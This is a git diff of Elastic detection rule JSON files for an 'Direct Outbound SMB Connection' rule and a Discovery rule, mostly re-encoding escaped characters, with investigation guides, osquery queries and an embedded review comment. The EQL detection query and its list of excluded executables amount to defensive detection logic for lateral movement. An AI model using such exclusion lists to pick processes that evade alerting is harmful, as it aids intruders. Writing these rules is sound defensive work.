triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
+ "note": "## Triage and analysis\n\n### Investigating Direct Outbound SMB Connection\n\nThis rule looks for unexpected processes making network connections over port 445. Windows file sharing is typically implemented over Server Message Block (SMB), which communicates between hosts using port 445. When legitimate, these network connections are established by the kernel (PID 4). Occurrences of non-system processes using this port can indicate port scanners, exploits, and tools used to move laterally on the environment.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
 "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.pid != 4 and\n not (process.executable : \"D:\\\\EnterpriseCare\\\\tools\\\\jre.1\\\\bin\\\\java.exe\" and process.args : \"com.emeraldcube.prism.launcher.Invoker\") and\n not (process.executable : \"C:\\\\Docusnap 11\\\\Tools\\\\nmap\\\\nmap.exe\" and process.args : \"smb-os-discovery.nse\") and\n not process.executable :\n (\"?:\\\\Program Files\\\\SentinelOne\\\\Sentinel Agent *\\\\Ranger\\\\SentinelRanger.exe\",\n \"?:\\\\Program Files\\\\Ivanti\\\\Security Controls\\\\ST.EngineHost.exe\",\n \"?:\\\\Program Files (x86)\\\\Fortinet\\\\FSAE\\\\collectoragent.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap\\\\nmap.exe\",\n \"?:\\\\Program Files\\\\Azure Advanced Threat Protection Sensor\\\\*\\\\Microsoft.Tri.Sensor.exe\",\n \"?:\\\\Program Files\\\\CloudMatters\\\\auvik\\\\AuvikService-release-*\\\\AuvikService.exe\",\n \"?:\\\\Program Files\\\\uptime software\\\\uptime\\\\UptimeDataCollector.exe\",\n \"?:\\\\Program Files\\\\CloudMatters\\\\auvik\\\\AuvikAgentService.exe\",\n \"?:\\\\Program Files\\\\Rumble\\\\rumble-agent-*.exe\")]\n [network where host.os.type == \"windows\" and destination.port == 445 and process.pid != 4 and\n not cidrmatch(destination.ip, \"127.0.0.1\", \"::1\")]\n",
 "related_integrations": [
 {
@@ -80,7 +80,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/c82c7d8f-fb9e-4874-a4bd-fd9e3f9becf1_106.json b/packages/security_detection_engine/kibana/security_rule/c82c7d8f-fb9e-4874-a4bd-fd9e3f9becf1_106.json
index a42f63f4b5d..81d921e432e 100644
--- a/packages/security_detection_engine/kibana/security_rule/c82c7d8f-fb9e-4874-a4bd-fd9e3f9becf1_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/c82c7d8f-fb9e-4874-a4bd-fd9e3f9becf1_106.json
@@ -13,7 +13,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Direct Outbound SMB Connection",
- "note": "## Triage and analysis\n\n### Investigating Direct Outbound SMB Connection\n\nThis rule looks for unexpected processes making network connections over port 445. Windows file sharing is typically implemented over Server Message Block (SMB), which communicates between hosts using port 445. When legitimate, these network connections are established by the kernel (PID 4). Occurrences of non-system processes using this port can indicate port scanners, exploits, and tools used to move laterally on the environment.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
+ "note": "## Triage and analysis\n\n### Investigating Direct Outbound SMB Connection\n\nThis rule looks for unexpected processes making network connections over port 445. Windows file sharing is typically implemented over Server Message Block (SMB), which communicates between hosts using port 445. When legitimate, these network connections are established by the kernel (PID 4). Occurrences of non-system processes using this port can indicate port scanners, exploits, and tools used to move laterally on the environment.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
 "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.pid != 4 and\n not (process.executable : \"D:\\\\EnterpriseCare\\\\tools\\\\jre.1\\\\bin\\\\java.exe\" and process.args : \"com.emeraldcube.prism.launcher.Invoker\") and\n not (process.executable : \"C:\\\\Docusnap 11\\\\Tools\\\\nmap\\\\nmap.exe\" and process.args : \"smb-os-discovery.nse\") and\n not process.executable :\n (\"?:\\\\Program Files\\\\SentinelOne\\\\Sentinel Agent *\\\\Ranger\\\\SentinelRanger.exe\",\n \"?:\\\\Program Files\\\\Ivanti\\\\Security Controls\\\\ST.EngineHost.exe\",\n \"?:\\\\Program Files (x86)\\\\Fortinet\\\\FSAE\\\\collectoragent.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap\\\\nmap.exe\",\n \"?:\\\\Program Files\\\\Azure Advanced Threat Protection Sensor\\\\*\\\\Microsoft.Tri.Sensor.exe\",\n \"?:\\\\Program Files\\\\CloudMatters\\\\auvik\\\\AuvikService-release-*\\\\AuvikService.exe\",\n \"?:\\\\Program Files\\\\uptime software\\\\uptime\\\\UptimeDataCollector.exe\",\n \"?:\\\\Program Files\\\\CloudMatters\\\\auvik\\\\AuvikAgentService.exe\",\n \"?:\\\\Program Files\\\\Rumble\\\\rumble-agent-*.exe\")]\n [network where host.os.type == \"windows\" and destination.port == 445 and process.pid != 4 and\n not cidrmatch(destination.ip, \"127.0.0.1\", \"::1\")]\n",
 "related_integrations": [
 {
@@ -79,7 +79,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/c82c7d8f-fb9e-4874-a4bd-fd9e3f9becf1_107.json b/packages/security_detection_engine/kibana/security_rule/c82c7d8f-fb9e-4874-a4bd-fd9e3f9becf1_107.json
index d6830d8f57c..c171d107b24 100644
--- a/packages/security_detection_engine/kibana/security_rule/c82c7d8f-fb9e-4874-a4bd-fd9e3f9becf1_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/c82c7d8f-fb9e-4874-a4bd-fd9e3f9becf1_107.json
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Direct Outbound SMB Connection", - "note": "## Triage and analysis\n\n### Investigating Direct Outbound SMB Connection\n\nThis rule looks for unexpected processes making network connections over port 445. Windows file sharing is typically implemented over Server Message Block (SMB), which communicates between hosts using port 445. When legitimate, these network connections are established by the kernel (PID 4). Occurrences of non-system processes using this port can indicate port scanners, exploits, and tools used to move laterally on the environment.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Direct Outbound SMB Connection\n\nThis rule looks for unexpected processes making network connections over port 445. Windows file sharing is typically implemented over Server Message Block (SMB), which communicates between hosts using port 445. When legitimate, these network connections are established by the kernel (PID 4). Occurrences of non-system processes using this port can indicate port scanners, exploits, and tools used to move laterally on the environment.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.pid != 4 and\n not (process.executable : \"D:\\\\EnterpriseCare\\\\tools\\\\jre.1\\\\bin\\\\java.exe\" and process.args : \"com.emeraldcube.prism.launcher.Invoker\") and\n not (process.executable : \"C:\\\\Docusnap 11\\\\Tools\\\\nmap\\\\nmap.exe\" and process.args : \"smb-os-discovery.nse\") and\n not process.executable :\n (\"?:\\\\Program Files\\\\SentinelOne\\\\Sentinel Agent *\\\\Ranger\\\\SentinelRanger.exe\",\n \"?:\\\\Program Files\\\\Ivanti\\\\Security Controls\\\\ST.EngineHost.exe\",\n \"?:\\\\Program Files (x86)\\\\Fortinet\\\\FSAE\\\\collectoragent.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap\\\\nmap.exe\",\n \"?:\\\\Program Files\\\\Azure Advanced Threat Protection Sensor\\\\*\\\\Microsoft.Tri.Sensor.exe\",\n \"?:\\\\Program Files\\\\CloudMatters\\\\auvik\\\\AuvikService-release-*\\\\AuvikService.exe\",\n \"?:\\\\Program Files\\\\uptime software\\\\uptime\\\\UptimeDataCollector.exe\",\n \"?:\\\\Program Files\\\\CloudMatters\\\\auvik\\\\AuvikAgentService.exe\",\n \"?:\\\\Program Files\\\\Rumble\\\\rumble-agent-*.exe\")]\n [network where host.os.type == \"windows\" and destination.port == 445 and process.pid != 4 and\n not cidrmatch(destination.ip, \"127.0.0.1\", \"::1\")]\n", "related_integrations": [ { @@ -80,7 +80,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", 
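Review bot: The new `note` text in the `@@ -13,7 +13,7 @@` hunk still ends its account-investigation step with "to the target host after the registry modification", which reads as residue from a registry-focused investigation guide; this rule alerts on an outbound SMB connection and its query makes no reference to registry activity, so the step should read `- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the suspicious SMB connection.`. Since this commit only re-encodes `\u003e` as `>`, the wording defect carries over unchanged from the old side. If this JSON is produced from the rule's upstream TOML source, the correction belongs there so it survives the next regeneration.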
diff --git a/packages/security_detection_engine/kibana/security_rule/c85eb82c-d2c8-485c-a36f-534f914b7663_101.json b/packages/security_detection_engine/kibana/security_rule/c85eb82c-d2c8-485c-a36f-534f914b7663_101.json index 6080d4808e3..97df0771f49 100644 --- a/packages/security_detection_engine/kibana/security_rule/c85eb82c-d2c8-485c-a36f-534f914b7663_101.json +++ b/packages/security_detection_engine/kibana/security_rule/c85eb82c-d2c8-485c-a36f-534f914b7663_101.json @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "c85eb82c-d2c8-485c-a36f-534f914b7663", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/c85eb82c-d2c8-485c-a36f-534f914b7663_102.json b/packages/security_detection_engine/kibana/security_rule/c85eb82c-d2c8-485c-a36f-534f914b7663_102.json index d198eb74018..3aa0afe6e02 100644 --- a/packages/security_detection_engine/kibana/security_rule/c85eb82c-d2c8-485c-a36f-534f914b7663_102.json +++ b/packages/security_detection_engine/kibana/security_rule/c85eb82c-d2c8-485c-a36f-534f914b7663_102.json 
@@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "c85eb82c-d2c8-485c-a36f-534f914b7663", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/c85eb82c-d2c8-485c-a36f-534f914b7663_103.json b/packages/security_detection_engine/kibana/security_rule/c85eb82c-d2c8-485c-a36f-534f914b7663_103.json index 37c2cea003f..edbec378c68 100644 --- a/packages/security_detection_engine/kibana/security_rule/c85eb82c-d2c8-485c-a36f-534f914b7663_103.json +++ b/packages/security_detection_engine/kibana/security_rule/c85eb82c-d2c8-485c-a36f-534f914b7663_103.json 
@@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "c85eb82c-d2c8-485c-a36f-534f914b7663", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/c85eb82c-d2c8-485c-a36f-534f914b7663_104.json b/packages/security_detection_engine/kibana/security_rule/c85eb82c-d2c8-485c-a36f-534f914b7663_104.json index 2888442c7fa..8efa8535094 100644 --- a/packages/security_detection_engine/kibana/security_rule/c85eb82c-d2c8-485c-a36f-534f914b7663_104.json +++ b/packages/security_detection_engine/kibana/security_rule/c85eb82c-d2c8-485c-a36f-534f914b7663_104.json 
@@ -54,7 +54,7 @@ ], "risk_score": 47, "rule_id": "c85eb82c-d2c8-485c-a36f-534f914b7663", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git 